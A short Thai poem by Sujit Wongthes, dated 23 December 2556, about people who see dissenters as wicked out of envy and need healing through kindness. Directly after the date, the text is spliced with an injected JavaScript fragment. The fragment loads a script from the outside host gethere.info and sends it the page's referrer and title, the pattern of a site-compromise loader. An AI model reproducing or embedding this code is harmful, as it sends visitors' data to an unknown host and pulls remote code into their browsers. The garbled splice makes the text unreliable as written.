คนเห็นคนคิดต่างว่าคิดเลว

เขาหล่นเหวแห่งจิตริษยา

ควรได้รับการบำบัดด้วยเมตตา

หายขาดแล้วถึงปล่อยมาเป็นผู้คน


สุจิตต์ วงษ์เทศ

จันทร์ 23  ธันวาคม 2556s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; d.getElementsByTagName(‘head’)[0].appendChild(s);